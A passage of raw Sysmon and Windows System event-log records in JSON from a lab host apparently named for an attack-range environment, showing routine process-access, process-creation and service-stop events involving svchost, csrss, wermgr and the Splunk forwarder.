05:49:30.457","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3911,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:30.457\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:30.457","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3912,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:30.457\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nSourceProcessId: 1144\r\nSourceThreadId: 1660\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-026A-5F25-0000-001020E50500}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:30.457","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","SourceProcessId":"1144","SourceThreadId":"1660","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-026A-5F25-0000-001020E50500}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e014|c:\\windows\\system32\\UBPM.dll+115a2|c:\\windows\\system32\\EventAggregation.dll+3fae|c:\\windows\\system32\\EventAggregation.dll+3ea1|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3913,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:30.457\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-026A-5F25-0000-001020E50500}\r\nTargetProcessId: 4516\r\nTargetImage: C:\\Windows\\system32\\wermgr.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:30.457","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-026A-5F25-0000-001020E50500}","TargetProcessId":"4516","TargetImage":"C:\\Windows\\system32\\wermgr.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:49:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:32","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76852,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The Network Setup Service service entered the stopped state.","param1":"Network Setup Service","param2":"stopped","EventReceivedTime":"2020-08-01 05:49:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3914,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.215\r\nProcessGuid: {A837DB8D-027E-5F25-0000-001074E90500}\r\nProcessId: 2284\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.215","ProcessGuid":"{A837DB8D-027E-5F25-0000-001074E90500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3915,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-027E-5F25-0000-001074E90500}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-027E-5F25-0000-001074E90500}","TargetProcessId":"2284","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3916,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-027E-5F25-0000-001074E90500}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-027E-5F25-0000-001074E90500}","TargetProcessId":"2284","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3917,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:49:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3918,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:49:50.214\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:49:50.214","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:49:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
